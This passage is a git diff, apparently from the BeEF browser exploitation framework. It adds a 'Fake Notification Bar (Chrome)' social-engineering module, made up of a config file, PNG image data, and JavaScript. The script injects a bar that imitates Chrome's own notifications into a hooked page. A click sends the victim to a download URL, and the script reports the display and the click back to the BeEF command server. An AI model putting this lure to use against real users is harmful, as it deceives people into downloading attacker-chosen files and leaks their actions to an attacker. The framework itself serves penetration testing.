mSsVK3RCZ1hBNWt9d6L6bWKpVMJe/65Z23mrBm2fft20YOzR00ZbhC3sTGAAmiSySQhCYMALC1KEFB8ZxC6v1yWYZkoz2K5Zrks7wVKjCQeDgJlynFb88STdtNNP7bi2ICtevB+u+Xnd1oBO6YZY7nY1Hb0/+nzPmn7zJ1rW159naiDX6UaNlYYstPP+nP7oz/9sJXKVXv66adt3/0OsKE8iQzzcAKUcyqEskLirCSLGOIkDZguT50+xAHzYyO218J97bVt2x34deaTTDQsm0264UtlgTRiKc0XmAFk1fVxiniWl4yBNb7HmehLOvS2n/7MySOX6bTeni677NLv2uBQ3u677z67+ZabLJ0BVJWS2zSVyVqV90JuKpNj7LA144/hqGXGIiDU8YKkUMZ3R684zG674y4IhSGwBuL2GtcLuCWWPEl7xcKYzyOXyTDHOjYNcYIYzsicAJWkZiqVihxQzipHVT8ylZxeFTvVfUViLmIFpSiGVKpcFM/ZvEWHUI9eYAMUHBqqpDnaAKoIoSIgRtKjCtbiaUXCuD308MuWL8SsQJ27XMYGpZQ9vGo9/eKkMJnKynrWhc3muOqsgbCsTcJAA6/VWDiMsWsgtHl7LWcsfVak60odI7JwHhZZ/ZABV+tFri2yETPIAoXWmU4TLitWKYp1VGhPwRaEHyRLBUeoMfDK6DDMEbqWUn9Gu+XiiP31f/isXXL5lSx2wtKxnMUxbAAzSJbEMWyhrJQNxi8FNn/23pZNdVpPV591kmUrcnA5Rs+4gZOMrRsvrhbr9utHH7UaJc9Kabdt2vSirXpsrW0r4TDpHlu8bH+75767SHgVEeT5MZgPgAOIBhsGkTTAIWHHMgsTT3Z4OTOZ7LS7bvuVze6bC5hgQjYUKrURQD/KtWnmBnABRMgGVYCmDHGmNOgvFytWqOGgmQ4MLqcF7qxlFScOiXazurpsx6sb7f5f/dIu/c4l9tjDj1lnZ87mz+230cHtOK4iYgeLi16V3OI5qoBjWctiA6AOeUSM2mA+2u3Vmv30F7faiqNWWIOIWcGh8qA7nYkzp4KVsVmB9U7jfWkGUy2KmbNc22kh8xWbi0FjYkjsEmIHOawLPgeiIhUR3OWOtt6iOXluxSuxnGtwLl0X76LQcLTtEGGyrvUG44Qk4vIuYZgbPCMDnMXhkj2xZos9+MAuu+bqfwPA3ZSRc3b11Y/YAw+8YY+v2RyRoMscRXJso6f+VpRwWYWN/AMu0DwGh2J41rtsrAw4hHh3KwxViTRZLAnQ+Rek476NHi1MjYUr2JYtW+yzn/ui/eQnPwV4SVs0f5atfe5FgAIomODnP/N56+yeYTPnzLPdu3fBRvfaTbfcbF+/+Ju2zz778NluW/nd79nM/gU2u6fPPv2p8whjgZXkIAIEDlKBYqpQcCpNWZHxlui7ArvI4SqViu8WYWr7wT//TxxFrBTYDT/+ic09aAXyhmgAVb5OVFn5/aucbVKU7v555RXW3z/bZvTPswdXPQbAQ3v5hXV2yinvt9mzZtppf/zH3oec8bLLV1ohX4QNq/a1r3zJfnH33XbOX15gPd399u2Lv2WlEtvBAOXXAHPZAQdZb1e/nf9Xn7DPfPaLNjCsdYMFGZPkgjYnYtRlZ/XPYh8gZYfCrIv3W2ybNm90WVAs5imPJW3D+vV27nmfhUQABRLmTsC6cuVVLEaHDQ+M2n+56MvW1dlrp51+ih2xYoU98vCv8eaiXfd/fmibN2/yvYWf3XqrXXnllYz/u8yTOX3wdBvY9YalAPgv7/yF7bP4AOvtnWOXXHqFZxGCqZxdYxUTpxKKrtHfYmXJNAFf4Gqxdr1ZTvG/BXRFvVrAPMzmzNvfRoiMhABPFKWoQ5gZT3QwS/4K2Fmc+aAD97JDD51jXV1Z+/FNq+zWn63GGVN25JFzbfHiOb4zKapT0i/cemSQ5JD04O/AowkdyNNjhM3RAu+T/UKvTyAB08TRjHWFPXRmoPoiIxojJI8VCYkwXw0WShG+pIFvuP7n9oOrr7ctL/+bnXfuWfb9a661YW5Y9chTdsftv7JXtr5hr7y6w7JdnYDmA/budx9rF5x/rm3Y+FvrnpGzo044yXZs32Y7N71gq355lz365BNWhrFBgRsySVSIkamWpQ0Zt5KrIMHGEICtMv5BAPe9yy+2rS8+Z7s3brGRodCuv/52u+S//b2Fo0NEjwphbdRu/vl9sJDZ7lc22Le++t9tzTPP2+v5gh1w8MEsRsJu+smttnDBPvb6wE678V+vw7nK5ANle+TxRwBJ3oLqmL2+dYt94i//xs7+q8/bk0+stSu/d5kVigPMcZOdeuY5dsW/3Gijw6/aSUcdbs//dgPMLjwQTpEkigCekDKL7YCryELccsfttuGl39pJ7zvBiq4nYT9AXC+U7Vf3rubqlKVg4sHdr7pEqcK8l628xh5/Yp3txFGv+V8/tJGRAYyCc6NX1z5J3kGZLYuTNcrD9q2v/50VYN71G7HvxlfspTUPAaph+/qX/ta+870r7Q2i6afPvxA7IUkUTZFgJUjAEzJsrlp0WSDUuARsRWHlTIBJDOws3Nzed+3t0iABRrqlAy2vttxhiGYwkrS/o9sTK+xBn+WxvKWzgb3nA4fYPkt6bdbsnHV2pWzJ0hn2gdMOsf5ZwoLKgS6m/JUb/X4vDgngqsw44jGqQBPgkWKTOAvrO0AkL0QyNCaD0cA9ORCYYV9CWgMWlTZUBUFsFnTPttt+cYfNmdljBx+8xHJ9/VbFa+YuWmojeMx/+psLbN1zT1giBwhhq/7Zs2ze/D76GrZsMrR3HXyY3X/fg/avP/qRJdDWUaKnGIEMYO7FwjDGUzLBOGRsvhODauwCwe6RMTvgwAPsz087xe68+SZ78jcv2rtPPsMWU8XZsXEjQKZeyn1pwqzWfvas+bZwTs7O+iDX33abzZzZh+RK2ruWH2633nq7Xf7tbxAS33CtFzJPMSgRnPEytuKYXXn1tfb+U0/FARbZnBk9bDYM2rPPP2NBzzx7/+kfshANf+bpH7SXXtqMhvQ6iCePHvWaABjJj9nc+Yvs8pX/ZHeTLyxZsjckQQAHjFEiyrWJTs8Rqsw7kYqqM8opfnzjLfa1r37DdfyChfPsyGOPRGsDHhhYul7RqwBVFgp5+7MP/4l94aK/tZkz+uzgZYstR3Iqff6hM/7ILvzUufbDH15r2XTOUuwe++aKvo+yLtfscZLGViKZzpIX4JCKSp4caw9UCbGoRn+zRn5cCtyoIKCkXKxeYixxPtMawFPO0iEE2cBBEtSvtYGjhK+GfIPUiR45mzOnm5yibCPDA0gw8hxn59YzArEniK1X3gcNwFvDA6VzOnKBFUZ3Y0yySkJHABvEkQ5JQK4agx8GcZ2MAxCeSiUlQjA5CAmoT84HPO40+l7OwgAlwfbd/0Db8PILdsJB/XbGycfbdTffYmMkEXRBv0XrTFZtZOertnz5Yfb46rV22invI4HKegTxB+0nqJ7kOqKNH01e9otKUVFJTwlDPJcjuSjaZ84/x1b+49/bR875a/vUhV+2DHq9EytJd8cVMok82v+oZ3ts7fPr7B//7nP2ny/8uH3kY5+zMkb/kw9/wtasfsDyW1+0o5YdaM+sexmWS7td6vlRQJOnFDuCU/RjcGlPZA/tdmXSJF1EE9VhVa4lJ1ARojsnndqcCkbP4iSeKKHFly47lFxmyH6z5gk7Yjn5DCGkDLMqyZQESKWz1k0/oaqQJHyjALTCFjR5nnUAhCxMl0jgLjxHSbyDHDkGCXeR9yp7prJdZAiBzZw/HwlbwR+HkJPKlThwlJlpX/nO5XbfHdfZT69dCTsute1DZWfmEk4bJzIEOp8BNoo4n6INKTW+UPUkU+91jZwjIkfmhMYP/bAS1wUlyxd3Ixu1ZU6ZlXZEliEeXsfh1a621L2KhpfKJgXI72c3P0k5sMBuZNa6mMsoY7rn7nVWLgB45T6SPgKyXv19lCT6q2t03iSZRIrGc6mC7XrjRS//6LipqhVVvLaiQykO0ghkSuLkzQKZf0dWrTLY4MAOH7fvMEKlKrEl8bit27bQTtUuuugL9mdnvcfWvbABORVYz4x+24QWR93alq2v2WuvbbFzL/ikdfD5YL6MYVWyiaplZbShwp0qMCGL4omywhxJqrw/AOiFIs4UT9n+By6zvv4eLzctX76P5UcHaUchkYgCywbco6nsGhq1lzZstr84+2y75NsX22OPriLEmj3zzFO2bOl+dvmll8DAHbZ7+6AnPkqOVA2IAQg/GsACxZV9IxN0pqeE5l+yzxILB1+3a6/5kT319FOE0tNs0b57tyqBzjRj+SHGRnSEcmsaJG3lR0e88qNokgW80qzqJ0/pbduWF233riF7YNVDdtFXLkEX95IzlOw97znevvDF/4gEWW2XXn4ZFYKHnNFDoiZVfWrDOA9sHaPiktQuYDnPmvAN613BQccAyHMvbbDjjl5h11z1T4CPJJJ7FUW2bd1qo6OjTmB6bN68mYqWpElog4ODngOVtCaqwqjy4SXQaMtcTF3DxjrCnCXqvL51vfV2BJQuBUIlcq5inKCqzXwtQeTWwaaX1+/0Eues3qwdsmyhHX7oYps7q9NJ7KUXduGY0aaGjlL4XpqKLS47muwtpnacYkAt9N7zY7ZlA1rLCoQxKhRo6ArGr2AIpDNaFvZhIVSP1HFUJWsxJEvIZ4qq8+bApDGYRFkw1YAkQIozmIcfutMW738QcmRfu+2etXbBJy60dBjYxz7yUbvuhlttxoJDYKMlduaHPmCHHnaInfDBD9nxp59pH//YebZjM5NM5Tj62mvFapKksY9tV3IA7brC8gp7VcBVZTApzqVU0HGxrln2gxuvs/vuvwUQwnjpEeub32MhzK+kfM78TpIzQE10OPyIkyzTv9guIJn731f9g3XF8/Yv3/8OwFlknQuW2tLDT7LjDj/eskStJGwPWcBPactwZECGTjj7wFpxjBzvtHnzFtoDd91gN19ziX3pa1+2i6+4zHblB5FbLHZAVAsK5C3yEZJuxpMivwjRm1mVYakXS+6pzhHHfqVGxpaQPJ50yAIixkz75je/aRd+5nyYFnZmDb/1Dxfb6WecaqeedhaElLMTjz+ZKMTacG9n30yLAfxOGCynMhzMqIqUV59a57AB/NlnnWW9/ftRKTnRvvpfv2gLZrGxxTVnf/RjtvqxJyFhHA6COeaYE2xgMO/7Fhs3bLWTT3o/BIZEokynHKxO6VX1ZEksAbrmwJbjh7Zp/RpbODuwLHiq4zSORE8Q2c5SuddLhtEu5RHL59lJx823Yw5fhB3GiHaDdjTvTzhmth1z9EIB0Df/vHyvdqZKETlY+ckT/UhYmV24UWrUG9/osa4576W0d7QlCBkVPDNGvVgqKeE7ciweLCvW0vsM+rhWL8CAWmE8CgZIV4cohaWQGABJddv6sHWkUza8u2q5zj7qpNJpeetRFYx2d4/EKNNlrAdAjQzvsjRVg1iql7Bco35L3KX9Rm3Yd6MSVELyYc5ryOx/kgwVvMwjeZRRmccDIIUvDJhACkizdmR6XA5VSYxU+45nZtvw4LD1MVydiBykpp6kzOU1ZfqIhwWv4w7nWYiOXrRx3gHc29lF2EWzNoajilWym0JDxTo4FywNOgyrZagMxcZ2Ub8mbwBo/+Oam+2qG++2e++93YLCTuvNAmYiTYNxJNL9XlmojQ3RGCIBkOvcj1KgLipAQzsHLAdrd1NpGhkhWnQigTh7E9a7rQpLpsMBJGOcJJl8YnDMjjriRLvh2usAxEF8nvWoUwJE2W7OxbN5U6U6kyPSxAPWrMhmEP1JJ48g2RLKkyi/ed0XDa3qQ57EW3lElTY6OjthZkmaqBavCk4xjwyiSKD9Bh1wanIvZqQqprIs54i2vYKU2HKvHb4E5h59jnGJXiNyFZ/6fomoWxta+kQJA2VI7YtIvkpmKDrK0SRVVH5W/xFde0uRrmt7xMpPvDsCNasUAqTh8hz7zfNZO/y4v8CD9+LzJBkpmhBxGNby/uuXmM5RY0hVZeIkUHVoUztlSjQFnizsoGK6ap41FjukeiDNlVVdk6GralFFrqQSaCvfeeuNiuZcF/eFTaEJqVCTuNRJfGIN+pWUYYELJBZ1GFkJar064lNJJdGNgKuHhZD2c+MqiUS7ZGgjZKuuod1QJXweZZASLEKddrWLRfrn85GU0g5rCvlXkT6F9eMkOZAVC0r7OfXDQrOgKi0lNQblUjC4iv811Ku09nuPPsq27Rg2WiDB7LR7KBXuv2wpUQBZUMLhedXOYTHs8IFmmXdKu2c4FFbD6SiXQiaM3qVXioxfO2kFVRR0ZAEGl0x57L5b7aPnXGhzFs2wbduHyCHOt+9fsZKTm0QEZaZKyhDCebE0Y8bqSBPlP2kHSpFauur8AY6izSOfh0hMkk5RhO+KzDfL+pdhdUmiBGugfEqyVBto0rACtbbK5QCSohpiivt3vP6aPbHqejv1WIY8ts56yJ0aSjJECHKOCN9eTFDJMOn44MH92nDSbrF+QSMsqcaukm6KNYx2+QXq5vNNoF5zgrYM/RcJWs1KDD1bXmxr15Vt6YEn2977HYVRVOrTT3OUIEroayF1rkDbtrAdCYu2St07NViFOB6B2pMGVubMd2klBIBD50yyHTnKgoMAF/YhhMmYfnqMf2pFiyHvVDKSSTM+wFcsAnR20/RzoQoZfjYtZqVMVgF8jE+bDzVCeRrNqFBW0cYC48rAipIOJfoQM7gjKlBS4lP0It1qalh9pq19JUCqYyvlqANOxgYIY2yceH7OTWI56WnfcfVIpo0cathaXOr8o2MFG0SrLNx3CcRAG5TXUvSVTrKcRIKaNCgkol2ylHYGBQYlIJJ8qu5ogYOch2mKmCrE8jn9UqNX3b9GhOpKyyZ5dke5ho2pvpnzWXgArOqDar/sK5QAMV+6c2QlvyCTMnZQBUMOXIB9A+SKNLFOn4h8WmdHxNCafwabC9RpklYBWLYV6DUnz6toI6qWKN9ifiSGWzc9ay8+/4gdc1iXdcSesnR9yALlSL5pGP0QQDmmE1C0A+5lPo1JBKGo5Tv9Ih9V1ngVMSmJ9fKdHn5uJML2pNfC48c34jpEQoO6tkJGHnbMYtNjnq19Ng9r7m17LT6WY6fzra+vz8GVJlTJWMryY9oo0K4aIZKdFu8rCROJyaS/vHivBVRJjvCco0Ih4BcBt35VU2KjIEUGL9DDAT5wT0Qd3PopWXRGRH6SySJdlNXjXAk0qQrtvlUQJyLovEeznJRSnRdDJJEAKqCUqRiI2Ruqx7PAFai3pvJeggVXrlzLeBgtVQYYt6REElADfCUx0miwnOTJyCiLyPhp0ct1Ocpf2nqPwXpil5DSk1gkxXiUGWqBVddOkLyKdaLECGfEYStEppKXxbAH52m0qmGdRA49pFJpDJ0aVlX+UtKtkiV2QHgLXJJCceSfztWIHZOsWRGt0dHdTfkOOab1pu8Cu7/pLLJKqFEukOecCe0HCPc8SWEMSagd4ArzzCAX66yFSwtRCeMTQ4sUFAXVjkdn/lafWt8ERKEjqGnaVLlNcmTna68gN9Yh4TajgXtxvpeo6+9kRxln01zQ/HVIykmvVVtWjiTl0dQkfh5JBS7ypLjXsfXUpFTj1m5zdH/7z82i07yRJImNPXYcUIy8TKjWln1ZB11y/ZbNLbM3BjO25fU6Rki4JKhp40AnqjyDBjgskCoPYi/pQ01aB3g0cf2+sbuzmwSIxEE7SXh12ff8VaKjdqmtdIwnHVpAV6YBXIrwptKZgm9M3qliutchiQrIEhlbh8xTsL/q6AqFFZgx4L4i14r5FZo1J99QoqqQ64CpfHdMLKBaMdHBDxqVPMSWiywi4+vuIVRTC9duGPuY3raCNrP2LfnAD1EBKuRCN7/fLLFfrYUvwrJyQmXwOkOhH5xKKjU4SCRmzGAjyRc5SgK7KTFUCVRb+Uq441wv4INuZz/9vq8Cq6WRWWJQ3/ygh4oSSWwt6aBcR8d4dF9M+lNVB6/dq4zIuhA9q0rYAEilUKM81klyqe1sEQ7HANh+lzxSsp/WWuiIgg5yCQSSYqxRdFYH5+R7PVTtkH1FVNEPBFQp0SGp6D45/MzulM3tqFLeDW34jSchuDF3ShEZVOEiWkUHyWIVEcarF8KtSFhzUOFCGPY1jo5E+ym+aEOzeVNExOMU3WRugTs2uvo4mNpTJPdmtapGFB5DDKawlp1B1hlT4gEAYQMX09p0UfGUSTfw0pg2C5i0JIe7C4DVLlF0mirysjpMJgeIweoNGE4HcLRFLEMHXsjXJFSC0sjQbXh1MovcgCl89lpA91IxMYYkXIeqp6Kl/cgiu5wxtlRD2FE16waLGSNZhCpoV+USZeo6pM57J06xLJtIOuGjaj8glyNFNMArbOlHBKLznL4SXooiUqgWL8gTl6L5yoJ6q3qpyp8KmUQiXwTZQZUAFea1MoAN/+QaXn3+whEsCJCcqWUDr3VHGzXKZ1SG085pA4eoI1/izFPhoY6zuM09LEsaAjhAL/v4gip5TjEOneNQcsAaoJF8h1j14kQnRxBcFkR9RUf9AJD0subIuFQLlhSM04+IRGALtRehMbm5ontqJJYheU5QGyI67tbhG5wA0hFxsb6VfCQjQgGOR0rjET6a52yVMIq8E4rsqt82t94dDhIC0rrqzzHVxuCOr1Y7jD2/+nhcJ9I3zuBqQeCG9pV5uml0Sk/hVCFczKmjgbBwioM+ylJlcNVYxCIS9Z4MegIobSs97K7G9xEj+kaJwiZA0v0xZRZyIu3rN4uPYlnVyqs4UrpZgqo5sLROURVG+FabVUCgklAapOioZYIwXaRmndH4aE88KkfJ4hR1Io0fU5RxGF9NCSlIFcPG0eiKBHponvID/YpehOCn0fTLDS2oVL/mTFtJHdLScDR+cadMIYmGZh1hDMoNBLAEc6HKHZ19oESqNlRBkL4Vw7tNsG/E9ErW/H9O4ZUQ1b28FlyKbFxXPU/yjP5TEIS0tj4RoLM4serUrsVVv9dRUMjDiULnToQLaW61D9B0fiaJDKlpF8kTQSKwchlP3qSRlVdEIIxkhyoQMH8H1ZGCqiORFND9HcxZGygxztSo5pzS7ifY0pqoHcejns1fQSRaoBZhOUtHbXmJWVGPs/zKMzy3cuqOxjHxY7ho+839Src2b4+VHgbU+iPC3eRH86LWj1KbjhM13NI5rTua1/qfU9uZ7prWZ23XRu2339z6dXd0sZ+6ZWITh/RbE2lOtjnA8XE2m4p+ndwcc/OW9msmDX0P83AztX3fPo7xUcvvmiQzMRONObK639O8sb2t9pm3uvB22vps/SLmzfc1matp06iPtqVsH5x/1T6yKWvevlZvtY57WM+o7Tf9TGT6Tt4Cbz52BZkmGWtDR87jU1J5W5FNbO6BbwK4rfWIDa16n/+fDcaB3QL4H14jRP3BDv+udnA294jIO9hap0WFYkUd/42GqlVE3IhT/ScNXu7UMvkJQ6mQmy49Vi9NhvzD67/rCv7B7m/CnZheBYc8P/6oK2FH6uu4hcSdSyZJUv/lQyssRaztx2KVy/D8vxM65w4SLPEoAAAAAElFTkSuQmCC);'});
+	var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 0 50px 0 15px; height: 27px; line-height: 27px; font-weight: bold; font-family: sans-serif; font-size: 12px; padding: 0'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html("<%= @notification_text %>");
+	$j(hid).append(ell);
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		window.location = '<%= @url %>';
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});
diff --git a/modules/social_engineering/fake_notification_c/config.yaml b/modules/social_engineering/fake_notification_c/config.yaml
new file mode 100644
index 000000000..64a33ae26
--- /dev/null
+++ b/modules/social_engineering/fake_notification_c/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_c:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Chrome)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Chrome. If the user clicks the notification they will be prompted to download the file specified below."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_c/img/filler.png b/modules/social_engineering/fake_notification_c/img/filler.png
new file mode 100644
index 0000000000000000000000000000000000000000..eba7a6a3cbe57892b539c48cf2ded514a9927835
GIT binary patch
literal 564
zcmV-40?Yl0P)<h;3K|Lk000e1NJLTq001HY000{Z1^@s688Tg`00001b5ch_0Itp)
z=>Px#1ZP1_K>z@;j|==^1poj532;bRa{vGi!~g&e!~vBn4jTXf0m(^3K~zXf%~m^7
z12GI;nNtB3RFurn&~X|nPQo=9hK`m7QgH#gkV&%U>F4ztXQ0VwcjiU@Nb-{`JEq;|
zeIEFe-y}`>XlgbcRj=krJ*W>LiyWsh*ClPJut638tv~K6A}xW63~QN#%que!$WaFK
zkgQKEg$crP0_bNlVuf=RG`rrcZpErZ1=qc=Bp@eqsxnJBSjY$ok;z$cMX>AowQSOM
zb>oS(RH8fEmMP_$*UB9S-|8L;!xTFl)$R8Ex*>94d*)io&Pdc`bgSlHV%65ZQA570
z!d$XN5AMz9sy@laC{8*cvGL;Mt<$<Hz<e4;3<xj|aGi0%GsXro$A!l*ona5V|6qiY
zIE570y0#E9q6{(y7`%FE%W8HWZGJw-#j2PhF^0~xFrIYXM(iwdl)f4g!g36m**kV<
zGrVv5Y*XRS6gB#8Th`yaUCF8UU5k>5c&|VuT4HN(0}7c~iBnS@5kD#cQj1kG5-Vx*
zdf|T)p%tt5i2P;8N^Ff^Sg|sdE8DN`Ai123_}_E1l#E2*s=Pj}U(SC$dAg6RBM;K|
z^VuSZ^k1|`j=tx9F+}L=>2eWQJUu>~>Kh>VY4igm(dOP8#znaR0000<MNUMnLSTX#
Cll3V8

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_c/img/plugins-left.png b/modules/social_engineering/fake_notification_c/img/plugins-left.png
new file mode 100644
index 0000000000000000000000000000000000000000..ee3f92c4eebd94d906a69405afbe7f0158401fad
GIT binary patch
literal 1775
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
Rnrr|7002ovPDHLkV1ix%V@&`6

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_notification_c/img/plugins-right.png b/modules/social_engineering/fake_notification_c/img/plugins-right.png
new file mode 100644
index 0000000000000000000000000000000000000000..514c649abb0e22fdb27de8a3dbef73e54f482441
GIT binary patch
literal 9546
zcmV-QCAHd#P)<h;3K|Lk000e1NJLTq006ZB000{Z1^@s6Iz`Sm00001b5ch_0Itp)
z=>Px#1ZP1_K>z@;j|==^1poj532;bRa{vGi!T<mc!T}X1N`L?WB;QFyK~#8N?VNeM
zoMn~gPrbF*-E*@qEC~sVKnVLH;KpLxH1wxiv~g(~uo<;=rWMB-wN+-c+h)_W%rxzc
zFtRBPqOzm#K?q9-*kKU@0kRTENOJeu>#dsa@4Qv_*1cQ;I`iqjtbB^9TlK!ra-QG$
zo!>dnQ^aboexqSQ%%VqN)(9<ZR4kE7TCLKshQ%!&PguPkT0CfQO=yiq&HN7i>Gw2m
zxB5got&jY*)qd-B(wA@kBR1aP+g$h-UpLz3qqhylIR0Ra?alk8eBXXutAE-VZ>njZ
zw;fqbHki1oG2TXCb?-y}X^p3DZqjCdZQV{kvB`tszNno^=GuepCcg54@Q+u0sCL_5
zo4rqbgdN&e(fe$gxY3{$zN~Xap!S$h13cA3wVUQTy&tngGO)0&E0T_>dMu=oQqxv(
zu8q4@+J_&Fvbi+B%WLW7Pckk|ss%op3F=m>)h(0jv~sCxwR*!cnUs|)Meim~?^=wQ
zz@p0?6atF|+BDLXWoa}QKp(5W7}rhr>i0V^e*cFz;lqd)-51Y|5`k^%y4QViqw91f
z%fK}nL-YRe1>Cb!YEIE(!ns?YG+HR|0Zkdt__(6`H10h+&y;aYxp-n6lWiEyZsNhR
zPWx!x@3@%eG0uSiy8R)5>z0buESbnytptP<fh7_(NU_GHae%E+B)BfLdQffRMy&v9
z@D!Qw_lC2qXR+!_XA1&!!qWk&R-?g&U^J1<TD?}YV!31;U1@97>wF&4xlj=I*Osy5
z`_ZWMoC?e~fJ|kEDSt;3`~894T8arkwHPgGbLvuwV|+TAiCcq-w>{i>_w<<Rgl*Ti
zaM5zC_WonzpqMgOA4~h=ZTf%H*e194cJcA89q8@)ZQ64j<uWeT!zp7iu`hNEYgQ{)
zER{~Oq|GShPAdl>>IWfUZt`)RYaEL${HXsHxxDk&SatoMV((`7ZI=mz3TvdS5+*E2
zW-XRTTd`E~E|PHu>@22hqF05V2r+t{42qV`1s=boowddnBpP(Yk`qn64gTL0IUC~u
ztJBi-Os&yQe&~}Hk54dq>zawBeJdkRMV0K*gwk|jo%v5h3y%}yrqgXK^;@{~J7ut`
zv)hwLz8!tM*(Cx8B`Ypw7I51h4Mraj#_M6;a_OqYW3X|kNpU@rB$iAyBYF!fEdX;(
zJrQ9Fpigz{J<nkBw}ARA=cXpwyio;;hUKgl_Sw$e3EQzVuz?Y?(J{;&&sa6AG}kPG
zvcMDRvt~2;)WdgcwI+M~o<QxOZ^p%Ux`dOjV@z@y2lo`FX*x>;>S%oRaaq)KQq8@=
zLbN?x_xj_Vf?A8ydbBf4%gk*;U>ZBsriArqZ6xnnGH=hX)7v+ajO`C6&S@S3>-b}u
zC{-hJOC!fcZd_aEDVdS$=&<f=-4@LXY~lQdm5S@FGY7D10(HdF4VXJ7(7IPgVsBhI
zxBAjt{~z)y<j0vVI$CYlVCQPA*Yf2KTmSMHN#k5wxYse(H*2Z&^ew>CGJ?W5mxvi#
z8nC5dgZ72;A@2#)Zw{5M<m0VDG!<NvS0*CKD0OLnwARoiR-0squG6PcyJDNxBeLx~
z4TG(_nh~toM>{J!KBtLPlXH&g1i^ISw+(ypV{yr(*XhTtcsNxqx9(Gm6QG`6exzXA
